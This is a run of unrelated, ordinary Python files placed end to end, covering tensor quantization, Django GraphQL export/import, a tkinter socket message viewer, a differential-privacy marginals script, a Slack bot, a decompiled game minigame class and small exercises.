solución aplicando un ligero cambio a la solución dada por parámetro. Entradas: sol (estructura de datos) La solución a mutar. Salidas: (estructura de datos) Una nueva solución que refleja un ligero cambio con respecto a la solución dada por parámetro """ return super().vecino(sol) # def indice_a_texto(self, sol): # sol_txt = [] # for indice in sol: # sol_txt.append(self.ciudades[indice]['km/min']) # return sol_txt# Funcions def print_hello(): print("Hello there") def greeting(name): print("Welcome, " + name) def greeting_dept(name,department): print("I'm " + name + " and I work at " + department) def area_triangle(base,height): return (base*height)/2 def convert_seconds(seconds): hours = seconds // 3600 minutes = (seconds - hours * 3600) // 60 remaining_seconds = seconds - hours * 3600 - minutes * 60 return hours, minutes , remaining_seconds print_hello() greeting("Emanuel") greeting("Carlos") greeting_dept("Emanuel","IT") greeting_dept("Carlos","Finance") area_a = area_triangle(5,4) area_b = area_triangle(7,3) print("area a: " + str(area_a)) print("area b: " + str(area_b)) hours, minutes , remaining_seconds = convert_seconds(50000) print("Hours: " + str(hours)) print("Minutes: " + str(minutes)) print("Remaining: " + str(remaining_seconds))#import win32print # impressora import win32printing import win32api import os from openpyxl import load_workbook class App2: def abrir_planilha_controle(self): self.caminho1 = r"C:\Users\andre.porto\Desktop\teste" self.caminho2 = r"C:\Users\andre.porto\Desktop\teste\pdf" # abrir planilha controle1 do excel planilha_nova = load_workbook(self.caminho1 + r'\controle.xlsx') self.celula = planilha_nova.active def configurar_impressora(self): # 2 é o valor padrão lista_impressoras = win32print.EnumPrinters(2) # exibe a lista de impressoras instaladas # print (lista_impressoras) # impressora n. 4 # para escolha da impressora, # contagem de trás para frente impressora = lista_impressoras[4] # 2 É A CONFIGURAÇÃO PADRÃO win32printing.SetDefaultPrinter(impressora[2]) def imprimir_documentos(self): # criando uma lista com os arquivos obtidos dentro da pasta 'pdf' lista_de_arquivos = os.listdir(self.caminho2) c = 2 # iniciar na posição 2 da célula C b = 2 # iniciar na posição 2 da célula D for arquivo in lista_de_arquivos: if(int(self.celula[f'C{c}'].value) % 2 != 0): for _ in range(self.celula[f'B{b}'].value): win32api.ShellExecute( 0, "print", arquivo, None, self.caminho2, 0) else: print(f'Arquivo:{arquivo} -> par') win32api.ShellExecute(0, "open", arquivo, None, self.caminho2, 0) c += 1 b += 1 if __name__ == '__main__': aplicativo = App2() aplicativo.abrir_planilha_controle() aplicativo.configurar_impressora() aplicativo.imprimir_documentos() print(' FIM -> PROGRAMA FINALIZADO....AGUARDE IMPRESSÃO!!') # # For licensing see accompanying LICENSE file. # Copyright (C) 2021 Apple Inc. All Rights Reserved. # import collections import numbers from typing import Any from typing import Optional import numpy as np import torch from torch import autograd from torch import nn from .special_tensors import RepresentibleByQuantizeAffine from .special_tensors import tag_with_metadata QuantizeAffineParams2 = collections.namedtuple( "QuantizeAffineParams", ["scale", "zero_point", "num_bits"] ) INFINITY = 1e10 def _validate_tensor(tensor: torch.Tensor) -> None: if torch.isnan(tensor).any(): raise ValueError("Found NaN in the tensor.") if tensor.abs().max() > INFINITY: raise ValueError( "Tensor seems to be diverging. Found a value > {}".format(INFINITY) ) def get_quantized_representation( tensor: torch.Tensor, quantize_params: QuantizeAffineParams2, ) -> torch.Tensor: """Gets the quantize representation of a float @tensor. The resulting tensor will contain the quantized values and the quantization parameters will be tagged with the tensor as a special tensor. A ValueError will be raised if the given tensor contains NaN or divergent values. Arguments: tensor (torch.Tensor): The float torch tensor to quantize. quantize_params (QuantizeAffineParams): The quantization params to quantize the tensor by. """ _validate_tensor(tensor) scale = quantize_params.scale zero_point = quantize_params.zero_point num_bits = quantize_params.num_bits if scale == 0: # Special case, all elements are zeros. if zero_point != 0: raise ValueError( "The given QuantizeAffineParams (={}) has a non-zero zero point" " with a scale of 0.".format(quantize_params) ) quantized_tensor = torch.zeros_like(tensor) tag_with_metadata(quantized_tensor, quantize_params) return quantized_tensor qmin, qmax = get_qmin_qmax(num_bits) reciprocal = 1 / scale quantized_tensor = ((tensor * reciprocal).round_() + zero_point).clamp_( qmin, qmax ) tag_with_metadata(quantized_tensor, quantize_params) return quantized_tensor def mark_quantize_affine( tensor: torch.Tensor, scale: float, zero_point: int, dtype: np.dtype = np.uint8, ) -> None: """Mark a tensor as quantized with affine. Arguments: tensor (torch.Tensor): The tensor to be marked as affine-quantizable Tensor. scale (float): the scale (from quantization parameters). zero_point (int): The zero_point (from quantization parameters). dtype (numpy.dtype): Type of tensor when quantized (this is usually numpy.uint8, which is used for Q8). A ValueError will be thrown if the input dtype is not one of the following: {numpy.uint8, numpy.int32}. """ quant_params = QuantizeAffineParams2(scale, zero_point, dtype) tag_with_metadata(tensor, RepresentibleByQuantizeAffine(quant_params)) class QuantizeAffineFunction(autograd.Function): """Simulates affect of affine quantization during forward pass. This function simulates the affect of quantization and subsequent dequantization (in the forward pass only). Although the affine transformation results in a different basis (e.g. uint8), the output of this function will be a float Tensor representing that transformation (the dequantized Tensor). A ValueError will be raised if the input or resulting tensor contains NaN or divergent values. Arguments: input (Tensor): The input float Tensor to be quantized. quantize_params (quantize_affine_util.QuantizeAffineParams): The quantization parameter to quantize the input tensor by. """ @staticmethod def forward( ctx: Any, input: torch.Tensor, quantize_params: QuantizeAffineParams2, ) -> torch.Tensor: quantized_tensor = get_quantized_representation(input, quantize_params) dequantized_tensor = dequantize(quantized_tensor, quantize_params) mark_quantize_affine( dequantized_tensor, quantize_params.scale, quantize_params.zero_point, quantize_params.num_bits, ) return dequantized_tensor @staticmethod def backward(ctx: Any, grad_output: Any) -> Any: """We will approximate the gradient as the identity""" return grad_output, None def quantize_affine_function_continuous( input: torch.Tensor, quantize_params: QuantizeAffineParams2, ) -> torch.Tensor: quantized_tensor = get_quantized_representation(input, quantize_params) dequantized_tensor = dequantize(quantized_tensor, quantize_params) mark_quantize_affine( dequantized_tensor, quantize_params.scale, quantize_params.zero_point, quantize_params.num_bits, ) return dequantized_tensor def get_qmin_qmax(num_bits): return -(2 ** (num_bits - 1)), 2 ** (num_bits - 1) - 1 def get_quantization_params( rmin: float, rmax: float, num_bits: int = 8, ) -> QuantizeAffineParams2: """Returns QuantizeAffineParams for a data range [rmin, rmax]. The range must include 0 otherwise that's a failure. The scale and zero_point are picked such that the error is quantization error is minimized. Arguments: rmin (float): The data minimum point. Numbers smaller than rmin would not be representible by the quantized schema. rmax (float): The data maximum point. Numbers bigger than rmax would not be representible by the quantized schema. dtype (optional, np.dtype): The dtype that should be used to represent the individual numbers after quantization. Only np.uint8 is supported. """ if rmin > rmax: raise ValueError("Got rmin (={}) > rmax (={}).".format(rmin, rmax)) if rmin > 0 or rmax < 0: raise ValueError( "The data range ([{}, {}]) must always include " "0.".format(rmin, rmax) ) if rmin == rmax == 0.0: # Special case: all values are zero. return QuantizeAffineParams2(0, 0, num_bits) # Scale is floating point and is (rmax - rmin) / (qmax - qmin) to map the # length of the ranges. For zero_point, we solve the following equation: # rmin = (qmin - zero_point) * scale qmin, qmax = get_qmin_qmax(num_bits) scale = (rmax - rmin) / (qmax - qmin) zero_point = qmin - (rmin / scale) zero_point = np.clip(round(zero_point), qmin, qmax).astype(np.int32) quantize_params = QuantizeAffineParams2(scale, zero_point, num_bits) # We must ensure that zero is exactly representable with these quantization # parameters. This is easy enough to add a self-check for. quantized_zero = quantize(np.array([0.0]), quantize_params) dequantized_zero = dequantize(quantized_zero, quantize_params) if dequantized_zero.item() != 0.0: raise ValueError( f"Quantization parameters are invalid: scale={scale}, zero={zero_point}. " f"Can't exactly represent zero." ) return quantize_params def quantize_affine_given_quant_params( input: torch.Tensor, quantize_params: QuantizeAffineParams2, ) -> torch.Tensor: """Get a quantizable approximation of a float tensor given quantize param. This function does not quantize the float tensor @input, but only adjusts it such that the returned float tensor has an exact quantized representation. This is a function that we want to use at training time to quantize biases and other parameters whose quantization schema is enforced by other parameteres. In forward pass, this function is equivalent to dequantize(get_quantized_representation(input, quantize_param)) However, in backward pass, this function operates as identity, making it ideal to be a part of the training forward pass. """ return QuantizeAffineFunction.apply(input, quantize_params) def quantize( arr: np.ndarray, quantize_params: QuantizeAffineParams2 ) -> np.ndarray: """Quantize a floating point array with respect to the quantization params. Arguments: arr (np.ndarray): The floating point data to quantize. quantize_params (QuantizeAffineParams): The quantization parameters under which the data should be quantized. """ scale = quantize_params.scale zero_point = quantize_params.zero_point num_bits = quantize_params.num_bits if scale == 0: # Special case, all elements are zeros. if zero_point != 0: raise ValueError( "The given QuantizeAffineParams (={}) has a non-zero zero point" " with a scale of 0.".format(quantize_params) ) return np.zeros_like(arr, dtype=np.int32) qmin, qmax = get_qmin_qmax(num_bits) reciprocal = 1 / scale quantized_values = (arr * reciprocal).round() + zero_point quantized_values = quantized_values.clip(qmin, qmax) return quantized_values def dequantize( q_arr: np.ndarray, quantize_params: QuantizeAffineParams2, ) -> np.ndarray: """Dequantize a fixed point array with respect to the quantization params. Arguments: q_arr (np.ndarray): The quantized array to dequantize. It's dtype must match quantize_params. quantize_params (QuantizeAffineParams): The quantization parameters under which the data should be dequantized. """ zero_point = quantize_params.zero_point scale = quantize_params.scale return (q_arr - zero_point) * scale def quantize_affine( input: torch.Tensor, min_value: Optional[numbers.Real] = None, max_value: Optional[numbers.Real] = None, num_bits: int = None, ) -> torch.Tensor: """Return a quantizable approximation of a float tensor @input. This function does not quantize the float tensor @input, but only adjusts it such that the returned float tensor has an exact quantized representation. This is a function that we want to use at training time to quantize weights and activations. Arguments: input (Tensor): The input float Tensor to be quantized. min_value (scalar): The running min value (possibly averaged). max_value (scalar): The running max value (possibly averaged). num_bits (numpy.dtype): The number of bits. """ if num_bits is None: raise ValueError("num_bits must be supplied") if min_value is None: # Force include 0 in our calculation of min_value. min_value = min(input.min().item(), 0.0) if max_value is None: # Force include 0 in our calculation of max_value. max_value = max(input.max().item(), 0.0) quantize_params = get_quantization_params(min_value, max_value, num_bits) return QuantizeAffineFunction.apply(input, quantize_params) class QuantizeAffine(nn.Module): """Pytorch quantize_affine layer for quantizing layer outputs. This layer will keep a running max and min, which is used to compute a scale and zero_point for the quantization. Note that it is not always desirable to start the quantization immediately while training. Arguments: momentum (scalar): The amount of averaging of min and max bounds. This value should be in the range [0.0, 1.0]. iteration_delay (scalar): The number of batches to wait before starting to quantize. """ def __init__( self, momentum=0.1, iteration_delay=0, num_bits=8, quantizer_freeze_min_max=False, ): super().__init__() self.momentum = momentum self.iteration_delay = iteration_delay self.increment_counter = False self.num_bits = num_bits self.register_buffer("running_min_value", torch.tensor(0.0)) self.register_buffer("running_max_value", torch.tensor(0.0)) self.register_buffer( "iteration_count", torch.zeros([1], dtype=torch.int32).squeeze() ) self.quantizer_freeze_min_max = quantizer_freeze_min_max def __repr__(self): return ( f"{self.__class__.__name__}(running_min=" f"{self.running_min_value}, running_max=" f"{self.running_max_value}, freeze_min_max=" f"{self.quantizer_freeze_min_max}, num_bits={self.num_bits})" ) def update_num_bits(self, num_bits): self.num_bits = num_bits def forward(self, input, recomp_bn_stats=False, override_alpha=False): if ( self.training and self.is_active() and not self.quantizer_freeze_min_max ): # Force include 0 in min_value and max_value calculation. min_value = min(input.min().item(), 0) max_value = max(input.max().item(), 0) if self.iteration_count == self.iteration_delay: new_running_min_value = min_value new_running_max_value = max_value else: new_running_min_value = ( 1.0 - self.momentum ) * self.running_min_value.item() + self.momentum * min_value new_running_max_value = ( 1.0 - self.momentum ) * self.running_max_value.item() + self.momentum * max_value self.running_min_value.fill_(new_running_min_value) self.running_max_value.fill_(new_running_max_value) if self.is_active(): output = quantize_affine( input, self.running_min_value.item(), self.running_max_value.item(), self.num_bits, ) else: output = input if self.training and self.increment_counter: self.iteration_count.fill_(self.iteration_count.item() + 1) return output def is_active(self): if self.training: return self.iteration_count >= self.iteration_delay # If evaluating, always run quantization: return True 0 from uuid import uuid4 import graphene from django.core.files.uploadedfile import InMemoryUploadedFile from import_export.admin import ExportMixin, ImportMixin from main.core.exceptions import PermissionDenied from main.core.permissions import ProductPermissions from main.core.utils import build_absolute_uri from main.export_import.models import ExportObj from main.export_import.tasks import create_product_variant_export_file, \ product_variant_import from main.graphql.core.mutations import BaseMutation, ModelDeleteMutation from main.graphql.core.types import Upload from main.graphql.core.types.common import ProductError from main.graphql.core.utils import str_to_enum from main.graphql.export_import.types import ExportObjType from main.product.models import ProductVariant class ProductVariantExport(BaseMutation): url = graphene.String() class Arguments: file_format = graphene.Argument(graphene.Enum( 'FileFormatEnum', [(str_to_enum(f().get_title()), f().get_title()) for f in ExportMixin().get_export_formats()], ), required=False, description="File format (xlsx, json, csv...).", ) class Meta: description = "Export product variants." permissions = (ProductPermissions.MANAGE_PRODUCTS,) error_type_class = ProductError error_type_field = "product_errors" @classmethod def perform_mutation(cls, root, info, **data): file_format = data.get('file_format', 'xlsx') file_url = str(uuid4()) url = build_absolute_uri(f"/download/{file_url}") export_obj = ExportObj.objects.create( file_url=file_url, model_name='ProductVariant', queryset=list(ProductVariant.objects.values_list('id', flat=True)) ) if ProductVariant.objects.count() < 10000: create_product_variant_export_file(export_obj.id, file_format) else: create_product_variant_export_file.delay(export_obj.id, file_format) return cls(url=url) class ExportObjDelete(ModelDeleteMutation): class Arguments: id = graphene.ID(required=True, description="ID of a export obj to delete.") class Meta: description = "Deletes an export object." model = ExportObj permissions = (ProductPermissions.MANAGE_PRODUCTS,) error_type_class = ProductError error_type_field = "product_errors" @classmethod def perform_mutation(cls, _root, info, **data): if not cls.check_permissions(info.context): raise PermissionDenied() node_id = data.get("id") instance = cls.get_node_or_error(info, node_id, only_type=ExportObjType) db_id = instance.id if instance.file: instance.file.delete() instance.delete() instance.id = db_id return cls.success_response(instance) FILE_FORMAT = { 'csv': 0, 'xls': 1, 'xlsx': 2, 'tsv': 3, 'json': 4, 'yaml': 5 } class ProductVariantImport(BaseMutation): class Arguments: file = Upload( required=True, description="Represents a file in a multipart request.", ) class Meta: description = ( "Import product variants from file" ) permissions = (ProductPermissions.MANAGE_PRODUCTS,) error_type_class = ProductError error_type_field = "product_errors" @classmethod def perform_mutation(cls, root, info, **data): file_format = FILE_FORMAT.get('xlsx', FILE_FORMAT['xlsx']) file_index = data.get('file') file: InMemoryUploadedFile = info.context.FILES.get(file_index) if file: import_mixin = ImportMixin() import_formats = import_mixin.get_import_formats() input_format = import_formats[file_format]() tmp_storage = import_mixin.write_to_tmp_storage(file, input_format) product_variant_import.delay(tmp_storage.name, file_format) return cls() 0 from __future__ import print_function import time from contextlib import contextmanager from hmmlearn.hmm import GaussianHMM @contextmanager def timed_step(title): print(title, end="... ", flush=True) start_time = time.clock() yield end_time = time.clock() print("done in {0:.2f}s".format(end_time - start_time)) def bench_gaussian_hmm(size): title = "benchmarking Gaussian HMM on a sample of size {0}".format(size) print(title.center(36, " ")) ghmm = GaussianHMM() ghmm.means_ = [[42], [24]] ghmm.covars_ = [[1], [1]] with timed_step("generating sample"): sample, _states = ghmm.sample(size) with timed_step("fitting"): fit = GaussianHMM(n_components=2).fit([sample]) with timed_step("estimating states"): fit.predict(sample) if __name__ == "__main__": bench_gaussian_hmm(2**16) # -*- coding: UTF-8 -*- import socket import threading import tkinter as tk import time import queue from PIL import Image, ImageTk from playsound import playsound window = tk.Tk() message_queue = queue.Queue(maxsize=10) def notify_sound(): playsound('tools/notify.mp3') def show_message(message): global message_queue temp_queue = queue.Queue(maxsize=10) localtime = time.localtime() result = time.strftime("%Y-%m-%d %I:%M:%S %p", localtime) if message_queue.full(): message_queue.get() message_queue.put([result, message]) else: message_queue.put([result, message]) index = message_queue.qsize() + 1 while not message_queue.empty(): message_list = message_queue.get() temp_queue.put(message_list) label_time = tk.Label(window, text=message_list[0], fg='#263238', font=('Arial', 12), width=30, height=2) label_time.grid(column=0, row=index) label_message = tk.Label(window, text=message_list[1], fg='#263238', font=('Arial', 12), width=45, height=2) label_message.grid(column=1, row=index) index -= 1 message_queue, temp_queue = temp_queue, message_queue t_notify = threading.Thread(target = notify_sound) t_notify.start() def server(): # HOST = '192.168.127.12' #實驗室電腦 # PORT = 8887 #在自己電腦測試的話 HOST = '127.0.0.1' PORT = 8888 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind((HOST, PORT)) s.listen(5) print('server start at: %s:%s' % (HOST, PORT)) print('wait for connection...') while True: conn, addr = s.accept() print('connected by ' + str(addr)) while True: indata = conn.recv(1024) if len(indata) == 0: # connection closed conn.close() print('client closed connection.') break message = indata.decode() print('recv: ' + message) # 將傳來的訊息顯示在GUI視窗上 show_message(message=message) outdata = 'echo ' + indata.decode() conn.send(outdata.encode()) def creat_label(): label1 = tk.Label(window, text='日期與時間', bg='yellow', fg='#263238', font=('Arial', 12), width=30, height=2) label1.grid(column=0, row=0) label2 = tk.Label(window, text='地址', bg='orange', fg='#263238', font=('Arial', 12), width=45, height=2) label2.grid(column=1, row=0) if __name__=='__main__': window.title('Server') window.geometry('1130x710') creat_label() t_server = threading.Thread(target = server) t_server.daemon = True t_server.start() window.mainloop()1-10 # python3 def hash(S, m): res = 0 p = 1000000007 x = 263 for i in range(len(S)): res += ((ord(S[i]))*(x**i))%p return (res%p)%m def solve(m, N): d = {} for N0 in range(N): l = input().split() if l[0] == 'add': s = l[1] h = hash(s, m) if h not in d: d[h] = [] d[h].append(s) else: if s not in d[h]: d[h].append(s) elif l[0] == 'del': s = l[1] h = hash(s, m) if h in d: if s in d[h]: d[h].remove(s) elif l[0] == 'find': s = l[1] h = hash(s, m) if h in d: if s in d[h]: print("yes") else: print("no") else: print("no") elif l[0] == 'check': i = int(l[1]) if i in d: for e in d[i][::-1]: print(e, end=" ") print() else: print() #print(d) if __name__ == '__main__': m = int(input()) N = int(input()) solve(m, N) # Copyright 2018 Whitestack, LLC # ************************************************************* # This file is part of OSM Monitoring module # All Rights Reserved to Whitestack, LLC # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # For those usages not covered by the Apache License, Version 2.0 please # contact: or ## import logging from typing import List import requests from requests.auth import HTTPBasicAuth from osm_mon.collector.infra_collectors.base_sdnc import BaseSdncInfraCollector from osm_mon.collector.metric import Metric from osm_mon.core.common_db import CommonDbClient from osm_mon.core.config import Config log = logging.getLogger(__name__) class OnosInfraCollector(BaseSdncInfraCollector): def __init__(self, config: Config, sdnc_id: str): super().__init__(config, sdnc_id) self.common_db = CommonDbClient(config) self.sdnc = self.common_db.get_sdnc(sdnc_id) def collect(self) -> List[Metric]: metrics = [] sdnc_status = self.is_sdnc_ok() if self.sdnc['_admin']['projects_read']: sdnc_project_id = self.sdnc['_admin']['projects_read'][0] else: sdnc_project_id = '' sdnc_tags = { 'sdnc_id': self.sdnc['_id'], 'project_id': sdnc_project_id } sdnc_status_metric = Metric(sdnc_tags, 'sdnc_status', sdnc_status) metrics.append(sdnc_status_metric) return metrics def is_sdnc_ok(self) -> bool: try: ip = self.sdnc['ip'] port = self.sdnc['port'] user = self.sdnc['user'] password = self.common_db.decrypt_sdnc_password(self.sdnc['password'], self.sdnc['schema_version'], self.sdnc['_id']) # TODO: Add support for https url = 'http://{}:{}/onos/v1/devices'.format(ip, port) requests.get(url, auth=HTTPBasicAuth(user, password)) return True except Exception: log.exception("SDNC status is not OK!") return False from mbi import LocalInference import numpy as np import argparse from hdmm import workload, templates, error from mbi import Dataset import itertools from autodp import privacy_calibrator import os import pandas as pd import pickle """ This is an implementation of HDMM+APPGM as described in the paper "Relaxed Marginal Consistency for Differentially Private Query Answering" This is a mechanism for answering a workload of marginal queries under epsilon or (epsilon, delta)-DP. This file depends on the autodp library and the hdmm library. The former can be installed with $ pip install autodp The latter can be installed by following the instructions on the official HDMM repository https://github.com/dpcomp-org/hdmm Note that HDMM optimizes for a measure of overall error. It achieves this by adding adding correlated non-uniform noise to different queries. If you are interested in evaluating max error, HDMM will be outperformed by a simpler mechanism that just answers every query with the same amount of noise, at least for the special case of marginal query workloads. Note that this file can take some time to run. The strategy selection step takes a good amount of time, but is saved so subsequent calls will take less time than the first call. """ def convert_matrix(domain, cliques): weights = {} for proj in cliques: tpl = tuple([domain.attrs.index(i) for i in proj]) weights[tpl] = 1.0 return workload.Marginals.fromtuples(domain.shape, weights) def convert_back(domain, Q): cliques = [] weights = [] for Qi in Q.matrices: wgt = Qi.weight key = tuple([domain.attrs[i] for i in Qi.base.tuple()]) cliques.append(key) weights.append(wgt) return cliques, weights def default_params(): """ Return default parameters to run this program :returns: a dictionary of default parameter settings for each command line argument """ params = {} params['dataset'] = '../data/adult.csv' params['domain'] = '../data/adult-domain.json' params['epsilon'] = 1.0 params['delta'] = 1e-9 params['degree'] = 2 params['num_marginals'] = None params['max_cells'] = 10000 params['noise'] = 'gaussian' params['parameterization'] = 'OPT+' params['pgm_iters'] = 2500 params['restarts'] = 1 params['seed'] = 0 params['save'] = None return params def optm(queries, approx=False): W = convert_matrix(data.domain, queries) if os.path.exists(strategy_path): print('loading strategy from file') A = pickle.load(open(strategy_path, 'rb')) else: print('optimizing strategy, could take a while') best_obj = np.inf for _ in range(args.restarts): if args.parameterization == 'OPTM': temp = templates.Marginals(data.domain.shape, approx=args.noise == 'gaussian', seed=args.seed) else: temp = templates.MarginalUnionKron(data.domain.shape, len(queries), approx=args.noise=='gaussian') obj = temp.optimize(W) if obj < best_obj: best_obj = obj A = temp.strategy() return convert_back(data.domain, A) def opt_plus(queries, approx=False): # Just return the workload itself, appropriately weighted weights = np.ones(len(queries)) return queries, weights if __name__ == '__main__': description = '' formatter = argparse.ArgumentDefaultsHelpFormatter parser = argparse.ArgumentParser(description=description, formatter_class=formatter) parser.add_argument('--dataset', type=str, help='path to dataset file') parser.add_argument('--domain', type=str, help='path to domain file') parser.add_argument('--epsilon', type=float, help='privacy parameter') parser.add_argument('--delta', type=float, help='privacy parameter') parser.add_argument('--degree', type=int, help='degree of marginals in workload') parser.add_argument('--num_marginals', type=int, help='number of marginals in workload') parser.add_argument('--max_cells', type=int, help='maximum number of cells for marginals in workload') parser.add_argument('--parameterization', choices=['OPTM', 'OPT+'], help='Strategy parameterization to optimize over') parser.add_argument('--noise', choices=['laplace', 'gaussian'], help='noise distribution to use') parser.add_argument('--workload', type=int, help='number of marginals in workload') parser.add_argument('--pgm_iters', type=int, help='number of optimization iterations') parser.add_argument('--restarts', type=int, help='number of HDMM restarts') parser.add_argument('--seed', type=int, help='random seed') parser.add_argument('--save', type=str, help='path to save results') parser.set_defaults(**default_params()) args = parser.parse_args() prng = np.random.RandomState(args.seed) data = Dataset.load(args.dataset, args.domain) print('%d Dimensional Domain' % len(data.domain)) if len(data.domain) >= 13 and args.parameterization == 'OPTM': print('Time complexity of strategy optimization using OPT_M is O(4^d), could be slow for this domain') queries = list(itertools.combinations(data.domain, args.degree)) queries = [cl for cl in queries if data.domain.size(cl) <= args.max_cells] if args.num_marginals is not None: queries = [queries[i] for i in prng.choice(len(queries), args.num_marginals, replace=False)] key = (args.degree, args.seed, data.domain.shape, args.noise == 'gaussian', args.max_cells, args.parameterization == 'OPTM') print(hash(key)) strategy_path = 'hdmm-%d.pkl' % hash(key) W = convert_matrix(data.domain, queries) if os.path.exists(strategy_path): print('loading strategy from file') strategy = pickle.load(open(strategy_path, 'rb')) else: if args.parameterization == 'OPTM': strategy = optm(queries, approx=args.noise == 'gaussian') else: strategy = opt_plus(queries, approx=args.noise == 'gaussian') pickle.dump(strategy, open(strategy_path, 'wb')) cliques, weights = strategy prng = np.random if args.noise == 'laplace': var = 2.0 / args.epsilon**2 sensitivity = np.linalg.norm(weights, 1) add_noise = lambda x: x+sensitivity*prng.laplace(loc=0, scale=1.0/args.epsilon, size=x.size) else: sigma = privacy_calibrator.gaussian_mech(args.epsilon, args.delta)['sigma'] var = sigma**2 sensitivity = np.linalg.norm(weights, 2) add_noise = lambda x: x + sensitivity*prng.normal(loc=0, scale=sigma, size=x.size) measurements = [] for proj, wgt in zip(cliques, weights): Q = wgt*workload.Identity(data.domain.size(proj)) x = data.project(proj).datavector() y = add_noise(Q @ x) measurements.append((Q,y,1.0,proj)) engine = LocalInference(data.domain,iters=args.pgm_iters, log=True) model = engine.estimate(measurements) errors = [] for proj in queries: X = data.project(proj).datavector() Y = model.project(proj).datavector() e = 0.5*np.linalg.norm(X/X.sum() - Y/Y.sum(), 1) errors.append(e) print('Average Error: ', np.mean(errors)) wapj/pyconkr2019 import asyncio import os import slack client = slack.WebClient(token=os.environ["BOT_ACCESS_TOKEN"], run_async=True) async def send_async_message(channel="#random", text="Hello"): response = await client.chat_postMessage(channel=channel, text=text) assert response["ok"] async def main(): await send_async_message() asyncio.run(main()) from django.urls import path from .views import ListPokemon, GetPokemon urlpatterns = [ path('', ListPokemon.as_view()), path('/', GetPokemon.as_view()) ]10-100 from .paddle import PaddleClient, PaddleException # NOQA: F401 # uncompyle6 version 3.2.4 # Python bytecode 2.7 (62211) # Decompiled from: Python 2.7.15 (v2.7.15:ca079a3ea3, Apr 30 2018, 16:30:26) [MSC v.1500 64 bit (AMD64)] # Embedded file name: lib.coginvasion.minigame.DistributedMinigame from panda3d.core import VBase4 from direct.distributed import DistributedObject from direct.gui.DirectGui import DirectLabel, OnscreenText from direct.interval.IntervalGlobal import Sequence, LerpFunc, Wait, Func from direct.showbase.Transitions import Transitions from direct.fsm.State import State from direct.fsm.ClassicFSM import ClassicFSM import Timer from lib.coginvasion.hood import ZoneUtil from lib.coginvasion.globals import CIGlobals from lib.coginvasion.gui.Dialog import GlobalDialog from HeadPanels import HeadPanels from FinalScoreGUI import FinalScoreGUI from lib.coginvasion.nametag import NametagGlobals import random transitions = Transitions(loader) def getAlertText(fg=(1, 0.9, 0.3, 1), scale=0.08): return OnscreenText(text='', font=CIGlobals.getMickeyFont(), fg=fg, pos=(0, 0.8, 0), scale=scale) def getAlertPulse(text, toScale1=0.12, toScale2=0.1): def change_text_scale(num): text.setScale(num) seq = Sequence(LerpFunc(change_text_scale, duration=0.3, toData=toScale1, fromData=0.01, blendType='easeOut'), LerpFunc(change_text_scale, duration=0.2, toData=toScale2, fromData=toScale1, blendType='easeInOut'), Wait(3.0), Func(text.setText, '')) return seq class DistributedMinigame(DistributedObject.DistributedObject, Timer.Timer): def __init__(self, cr): try: self.DistributedMinigame_initialized return except: self.DistributedMinigame_initialized = 1 DistributedObject.DistributedObject.__init__(self, cr) Timer.Timer.__init__(self) self.headPanels = HeadPanels() self.finalScoreUI = FinalScoreGUI() self.fsm = ClassicFSM('DistributedMinigame', [State('start', self.enterStart, self.exitStart, ['waitForOthers']), State('waitForOthers', self.enterWaitForOthers, self.exitWaitForOthers, ['play']), State('play', self.enterPlay, self.exitPlay, ['gameOver']), State('gameOver', self.enterGameOver, self.exitGameOver, ['off']), State('off', self.enterOff, self.exitOff)], 'off', 'off') self.fsm.enterInitialState() self.cr = cr self.localAv = base.localAvatar self.localAvId = self.localAv.doId self.musicPath = 'phase_4/audio/bgm/trolley_song.mid' self.winSfx = base.loadSfx('phase_4/audio/sfx/MG_win.ogg') self.loseSfx = base.loadSfx('phase_4/audio/sfx/MG_lose.ogg') self.prizeHigh = base.loadSfx('phase_6/audio/sfx/KART_Applause_1.ogg') self.prizeLow = base.loadSfx('phase_6/audio/sfx/KART_Applause_4.ogg') self.music = None self.description = '' self.descDialog = None self.winnerPrize = 0 self.loserPrize = 0 self.winnerMsg = 'Winner!\nYou have earned: %s Jellybeans' self.loserMsg = 'Loser!\nYou have earned: %s Jellybeans' self.allWinnerMsgs = ['Nice try!\nYou have earned: %s', 'Good job!\nYou have earned: %s', 'Way to go!\nYou have earned: %s', 'Awesome!\nYou have earned: %s'] self.timer = None self.timeLbl = None self.alertText = None self.alertPulse = None self.popupSound = None self.gameOverLbl = OnscreenText(text="TIME'S\nUP!", scale=0.25, font=CIGlobals.getMickeyFont(), fg=(1, 0, 0, 1)) self.gameOverLbl.setBin('gui-popup', 60) self.gameOverLbl.hide() return def getTeamDNAColor(self, team): pass def showAlert(self, text): self.stopPulse() base.playSfx(self.popupSound) self.alertText.setText(text) self.alertPulse = getAlertPulse(self.alertText) self.alertPulse.start() def stopPulse(self): if self.alertPulse: self.alertPulse.finish() self.alertPulse = None return def enterFinalScores(self): self.finalScoreUI.load() self.finalScoreUI.showFinalScores() def exitFinalScores(self): self.finalScoreUI.hideFinalScores() self.finalScoreUI.unload() def finalScores(self, avIdList, scoreList): self.finalScoreUI.handleFinalScores(avIdList, scoreList) def generateHeadPanel(self, gender, head, headtype, color, doId, name): self.headPanels.generate(gender, head, headtype, color, doId, name) def updateHeadPanelValue(self, doId, direction): self.headPanels.updateValue(doId, direction) def setTimerTime(self, time): self.setTime(time) def createTimer(self): Timer.Timer.load(self) def deleteTimer(self): Timer.Timer.unload(self) def setDescription(self, desc): self.description = desc def getDescription(self): return self.description def enterStart(self): self.descDialog = GlobalDialog(style=3, message=self.getDescription(), doneEvent='gameDescAck') self.acceptOnce('gameDescAck', self.handleDescAck) def handleDescAck(self): self.d_ready() self.fsm.request('waitForOthers') def exitStart(self): self.ignore('gameDescAck') self.descDialog.cleanup() del self.descDialog def enterWaitForOthers(self): self.waitLbl = DirectLabel(text='Waiting for other players...', relief=None, text_fg=(1, 1, 1, 1), text_scale=0.08, text_shadow=(0, 0, 0, 1)) return def exitWaitForOthers(self): self.waitLbl.destroy() del self.waitLbl def setLoserPrize(self, prize): self.loserPrize = prize def setWinnerPrize(self, prize): self.winnerPrize = prize def getLoserPrize(self): return self.loserPrize def getWinnerPrize(self): return self.winnerPrize def winner(self): self.winSfx.play() 